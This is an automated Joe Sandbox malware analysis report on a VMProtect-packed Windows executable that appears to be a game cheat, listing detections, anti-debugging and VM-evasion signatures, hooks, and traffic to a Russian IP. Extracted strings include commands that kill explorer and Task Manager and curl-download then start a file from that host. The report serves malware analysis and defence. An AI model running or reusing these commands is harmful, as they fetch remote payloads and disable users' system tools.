Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002A_290.exe

Overview

General Information

Sample name:LisectAVT_2403002A_290.exe
Analysis ID:1482366
MD5:1a23985dadc6831a82e0595728023980
SHA1:a3e8ec7d8f8d7accb522245445dc8159c0b94d12
SHA256:7206d4443497a4bc7fd0cff0fe622e5b7037ea4947f1c2f313ef98eb755e99fc
Tags:exe
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
AI detected suspicious sample
Detected VMProtect packer
Found direct / indirect Syscall (likely to bypass EDR)
Hides threads from debuggers
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Tries to detect debuggers (CloseHandle check)
Tries to detect virtualization through RDTSC time measurements
Tries to evade analysis by execution special instruction (VM detection)
Checks if the current process is being debugged
Detected TCP or UDP traffic on non-standard ports
Entry point lies outside standard sections
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info

Classification

  • System is w10x64
  • LisectAVT_2403002A_290.exe (PID: 3380 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_290.exe" MD5: 1A23985DADC6831A82E0595728023980)
    • conhost.exe (PID: 2972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: LisectAVT_2403002A_290.exeAvira: detected
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
Source: LisectAVT_2403002A_290.exeJoe Sandbox ML: detected
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_7aa4c8a2-e
Source: LisectAVT_2403002A_290.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\decoder\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037748439.00000179148EF000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037748439.00000179148EF000.00000002.10000000.00040000.00000000.sdmp
Source: global trafficTCP traffic: 192.168.2.5:49704 -> 185.204.109.14:5145
Source: unknownTCP traffic detected without corresponding DNS query: 185.204.109.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.204.109.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.204.109.14
Source: unknownTCP traffic detected without corresponding DNS query: 185.204.109.14
Source: LisectAVT_2403002A_290.exeString found in binary or memory: http://185.204.109.14:4777/ballincasin.mp3
Source: LisectAVT_2403002A_290.exeString found in binary or memory: http://185.204.109.14:4777/ballincasin.mp3start
Source: LisectAVT_2403002A_290.exeString found in binary or memory: http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07
Source: LisectAVT_2403002A_290.exeString found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: LisectAVT_2403002A_290.exeString found in binary or memory: http://pki-ocsp.symauth.com0
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037765453.00000179148F7000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.zlib.net/D
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037962399.0000017916281000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/V
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037962399.0000017916281000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: LisectAVT_2403002A_290.exeString found in binary or memory: https://discord.gg/W2mrcAMEAH
Source: LisectAVT_2403002A_290.exeString found in binary or memory: https://discord.gg/W2mrcAMEAHChams
Source: LisectAVT_2403002A_290.exeString found in binary or memory: https://www.myinstants.com/media/sounds/skibidi-toilet.mp3

System Summary

barindex
Source: LisectAVT_2403002A_290.exeStatic PE information: .vmp0 and .vmp1 section names
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037962399.0000017916281000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamelibcurl.dllB vs LisectAVT_2403002A_290.exe
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037765453.00000179148F7000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamezlib1.dll* vs LisectAVT_2403002A_290.exe
Source: classification engineClassification label: mal84.evad.winEXE@2/1@0/1
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2972:120:WilError_03
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\LisectAVT_2403002A_290.exe "C:\Users\user\Desktop\LisectAVT_2403002A_290.exe"
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: zlib1.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: libcurl.dllJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSection loaded: mswsock.dllJump to behavior
Source: LisectAVT_2403002A_290.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: LisectAVT_2403002A_290.exeStatic file information: File size 4124168 > 1048576
Source: LisectAVT_2403002A_290.exeStatic PE information: Raw size of .vmp1 is bigger than: 0x100000 < 0x3df400
Source: LisectAVT_2403002A_290.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\decoder\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037748439.00000179148EF000.00000002.10000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\decoder\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037748439.00000179148EF000.00000002.10000000.00040000.00000000.sdmp
Source: initial sampleStatic PE information: section where entry point is pointing to: .vmp1
Source: LisectAVT_2403002A_290.exeStatic PE information: section name: .vmp0
Source: LisectAVT_2403002A_290.exeStatic PE information: section name: .vmp1

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8A50008 value: E9 8B D7 E9 FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88ED790 value: E9 80 28 16 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8A60008 value: E9 8B DA E8 FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88EDA90 value: E9 80 25 17 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8A70008 value: E9 4B D6 E7 FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88ED650 value: E9 C0 29 18 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8A80008 value: E9 AB D0 E6 FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88ED0B0 value: E9 60 2F 19 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8A90008 value: E9 0B D2 E5 FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88ED210 value: E9 00 2E 1A 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8AA0008 value: E9 0B D9 E4 FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88ED910 value: E9 00 27 1B 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8AB0008 value: E9 CB D4 E3 FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88ED4D0 value: E9 40 2B 1C 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8AC0008 value: E9 2B D9 E2 FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88ED930 value: E9 E0 26 1D 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8AD0008 value: E9 0B DA E1 FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88EDA10 value: E9 00 26 1E 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8AE0008 value: E9 EB D4 E0 FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88ED4F0 value: E9 20 2B 1F 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8AF0008 value: E9 2B D5 DF FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88ED530 value: E9 E0 2A 20 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8B00008 value: E9 4B D4 DE FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88ED450 value: E9 C0 2B 21 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8B10008 value: E9 EB D9 DD FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88ED9F0 value: E9 20 26 22 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8B2000D value: E9 BB CB DF FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C891CBC0 value: E9 5A 34 20 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8B30008 value: E9 CB D1 DB FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88ED1D0 value: E9 40 2E 24 00 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C8B40008 value: E9 EB D1 DA FF Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeMemory written: PID: 3380 base: 7FF8C88ED1F0 value: E9 20 2E 25 00 Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeRDTSC instruction interceptor: First address: 7FF7FE4684F1 second address: 7FF7FE46850E instructions: 0x00000000 rdtsc 0x00000002 inc ecx 0x00000003 pop ecx 0x00000004 inc ebp 0x00000005 bsf edi, esi 0x00000008 stc 0x00000009 and ah, 0000004Bh 0x0000000c pop ebp 0x0000000d inc ecx 0x0000000e test bl, 0000005Fh 0x00000011 inc ecx 0x00000012 adc bl, FFFFFF9Fh 0x00000015 inc eax 0x00000016 xor bh, 0000002Ah 0x00000019 pop esi 0x0000001a inc ecx 0x0000001b rcr ch, cl 0x0000001d rdtsc
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSpecial instruction interceptor: First address: 7FF7FEAE8076 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: LisectAVT_2403002A_290.exe, 00000000.00000002.2037782890.000001791498F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeHandle closed: DEADC0DE
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeProcess queried: DebugObjectHandleJump to behavior
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeNtCreateFile: Indirect: 0x7FF7FE704677Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeNtQueryVolumeInformationFile: Indirect: 0x7FF7FE704786Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeNtMapViewOfSection: Indirect: 0x7FF7FE7049CEJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeNtProtectVirtualMemory: Indirect: 0x7FF7FE7024BEJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeNtQueryAttributesFile: Indirect: 0x7FF7FE704618Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeNtOpenFile: Indirect: 0x7FF7FE7046E2Jump to behavior
Source: LisectAVT_2403002A_290.exeBinary or memory string: Shell_TrayWnd
Source: LisectAVT_2403002A_290.exeBinary or memory string: than 10.00 aim could work incorrect!%dmsWorldXRay Status:waitWarning!PreviewOther##crossSpeedRainbowstalcraft.exestalcraftw.exeGame executableInfobibadaysbober.su Discordhttps://discord.gg/W2mrcAMEAHChams loadingABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789RtlAdjustPrivilegentdll.dllNtRaiseHardError Y: X: C:\Windows\Fonts\Arial.ttftemp.buf > \/taskkill /IM explorer.exe /Ftaskkill /IM taskmgr.exe /F\ballincasin.mp3curl -o ballincasin.mp3 http://185.204.109.14:4777/ballincasin.mp3start ballincasin.mp3"del "Shell_TrayWnd.bmpFailed to initialize WinsockFailed to create socket185.204.109.14Failed to connect to serverFailedCheck your internet connection!rwid;;explorer.execurl -o skibidi.mp3 https://www.myinstants.com/media/sounds/skibidi-toilet.mp3\skibidi.mp3bimba
Source: C:\Users\user\Desktop\LisectAVT_2403002A_290.exeQueries volume information: C:\ VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
2
Process Injection
11
Virtualization/Sandbox Evasion
1
Credential API Hooking
411
Security Software Discovery
Remote Services1
Credential API Hooking
1
Non-Standard Port
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Abuse Elevation Control Mechanism
2
Process Injection
LSASS Memory11
Virtualization/Sandbox Evasion
Remote Desktop Protocol1
Archive Collected Data
Junk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
1
Abuse Elevation Control Mechanism
Security Account Manager2
Process Discovery
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS212
System Information Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
LisectAVT_2403002A_290.exe100%AviraTR/Black.Gen2
LisectAVT_2403002A_290.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://pki-ocsp.symauth.com00%URL Reputationsafe
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr0%URL Reputationsafe
https://curl.se/docs/copyright.htmlD0%Avira URL Cloudsafe
http://185.204.109.14:4777/ballincasin.mp3start0%Avira URL Cloudsafe
https://curl.se/docs/http-cookies.html0%Avira URL Cloudsafe
https://curl.se/docs/alt-svc.html0%Avira URL Cloudsafe
https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
http://185.204.109.14:4777/ballincasin.mp30%Avira URL Cloudsafe
http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl070%Avira URL Cloudsafe
https://www.myinstants.com/media/sounds/skibidi-toilet.mp30%Avira URL Cloudsafe
https://discord.gg/W2mrcAMEAH0%Avira URL Cloudsafe
http://www.zlib.net/D0%Avira URL Cloudsafe
https://discord.gg/W2mrcAMEAHChams0%Avira URL Cloudsafe
https://curl.se/V0%Avira URL Cloudsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://curl.se/docs/hsts.htmlLisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://curl.se/docs/copyright.htmlDLisectAVT_2403002A_290.exe, 00000000.00000002.2037962399.0000017916281000.00000002.10000000.00040000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://curl.se/docs/http-cookies.htmlLisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://pki-ocsp.symauth.com0LisectAVT_2403002A_290.exefalse
  • URL Reputation: safe
unknown
http://185.204.109.14:4777/ballincasin.mp3LisectAVT_2403002A_290.exefalse
  • Avira URL Cloud: safe
unknown
http://www.zlib.net/DLisectAVT_2403002A_290.exe, 00000000.00000002.2037765453.00000179148F7000.00000002.10000000.00040000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://185.204.109.14:4777/ballincasin.mp3startLisectAVT_2403002A_290.exefalse
  • Avira URL Cloud: safe
unknown
http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.crLisectAVT_2403002A_290.exefalse
  • URL Reputation: safe
unknown
https://www.myinstants.com/media/sounds/skibidi-toilet.mp3LisectAVT_2403002A_290.exefalse
  • Avira URL Cloud: safe
unknown
https://curl.se/docs/alt-svc.htmlLisectAVT_2403002A_290.exe, 00000000.00000002.2037923988.0000017916264000.00000002.10000000.00040000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://pki-crl.symauth.com/ca_219679623e6b4fa507d638cbeba72ecb/LatestCRL.crl07LisectAVT_2403002A_290.exefalse
  • Avira URL Cloud: safe
unknown
https://discord.gg/W2mrcAMEAHLisectAVT_2403002A_290.exefalse
  • Avira URL Cloud: safe
unknown
https://curl.se/VLisectAVT_2403002A_290.exe, 00000000.00000002.2037962399.0000017916281000.00000002.10000000.00040000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://discord.gg/W2mrcAMEAHChamsLisectAVT_2403002A_290.exefalse
  • Avira URL Cloud: safe
unknown
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
185.204.109.14
unknownRussian Federation
39444OWENTIS-ASFRfalse
Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1482366
Start date and time:2024-07-25 21:52:17 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 2m 52s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:3
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:LisectAVT_2403002A_290.exe
Detection:MAL
Classification:mal84.evad.winEXE@2/1@0/1
EGA Information:Failed
HCA Information:Failed
Cookbook Comments:
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Execution Graph export aborted for target LisectAVT_2403002A_290.exe, PID 3380 because there are no executed function
  • Not all processes where analyzed, report is missing behavior information
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • VT rate limit hit for: LisectAVT_2403002A_290.exe
No simulations
MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
185.204.109.142132.exeGet hashmaliciousUnknownBrowse
    No context
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    OWENTIS-ASFRDoc-317715824.emlGet hashmaliciousHTMLPhisherBrowse
    • 85.31.212.12
    VM 976-687889, June 05, 2024.emlGet hashmaliciousUnknownBrowse
    • 85.31.212.12
    Agreement 19-77329-05-Jun-2024.emlGet hashmaliciousHTMLPhisherBrowse
    • 85.31.212.12
    2132.exeGet hashmaliciousUnknownBrowse
    • 185.204.109.14
    sora.x86.elfGet hashmaliciousMiraiBrowse
    • 85.31.212.133
    Yk6wfqLJ92.elfGet hashmaliciousMiraiBrowse
    • 85.31.212.153
    N3IaNLgXfp.elfGet hashmaliciousMiraiBrowse
    • 85.31.212.111
    LvVirzr3Fq.elfGet hashmaliciousMiraiBrowse
    • 85.31.212.110
    sScKDrSyhOGet hashmaliciousMiraiBrowse
    • 85.31.212.127
    aBot.arm7Get hashmaliciousMiraiBrowse
    • 85.31.212.108
    No context
    No context
    Process:C:\Users\user\Desktop\LisectAVT_2403002A_290.exe
    File Type:ASCII text, with CRLF line terminators
    Category:dropped
    Size (bytes):21028
    Entropy (8bit):2.5216406363433186
    Encrypted:false
    SSDEEP:6:1bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbZ:H
    MD5:5B2B4C3CB341EF187A6BAE00E3731C7C
    SHA1:742901CE151851F6FB1F0EFC900C4A9AE608AF60
    SHA-256:F47B0980D149BE356F7AB6F83D03AE5BD63791409C177261C596DAFAB3279274
    SHA-512:DFFF0732647E72E54DA0D5E2AB6617ADF31299517FA699F35B93A2F6D7965F0D0C67A7A7E4B6FBA39BBF75655EF9F924ED05E1AA976023125141E3FE38F187D5
    Malicious:false
    Reputation:low
    Preview:bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba..bimba.
    File type:PE32+ executable (console) x86-64, for MS Windows
    Entropy (8bit):7.987223618881403
    TrID:
    • Win64 Executable Console (202006/5) 92.65%
    • Win64 Executable (generic) (12005/4) 5.51%
    • Generic Win/DOS Executable (2004/3) 0.92%
    • DOS Executable Generic (2002/1) 0.92%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:LisectAVT_2403002A_290.exe
    File size:4'124'168 bytes
    MD5:1a23985dadc6831a82e0595728023980
    SHA1:a3e8ec7d8f8d7accb522245445dc8159c0b94d12
    SHA256:7206d4443497a4bc7fd0cff0fe622e5b7037ea4947f1c2f313ef98eb755e99fc
    SHA512:17daf3895ce90820ae289a10ecc97459199b70c3c08dae9c4284b202c319e400a95f31e53caa8bc0aca0fbb5c95424c4e27a56898b9aa551c0ea832c5bb117ac
    SSDEEP:98304:QL4fhqBZfj5dzCIZdmH1eYmxDrnAwvOTVoC2FCBazNoI:Qnfj5dCIZdmH1CvaA/zN
    TLSH:93163397E50E07A9D40A5BB095EB49E078D6399D2F85D02D797CEECE338181DCF02B62
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........&...G...G...G...?r..G.......G.......G.......G.......G.......G...?...G...G...F.......G.......G.......G..Rich.G..........PE..d..
    Icon Hash:00928e8e8686b000
    Entrypoint:0x14043c70c
    Entrypoint Section:.vmp1
    Digitally signed:false
    Imagebase:0x140000000
    Subsystem:windows cui
    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Time Stamp:0x65EC8566 [Sat Mar 9 15:51:02 2024 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:6
    OS Version Minor:0
    File Version Major:6
    File Version Minor:0
    Subsystem Version Major:6
    Subsystem Version Minor:0
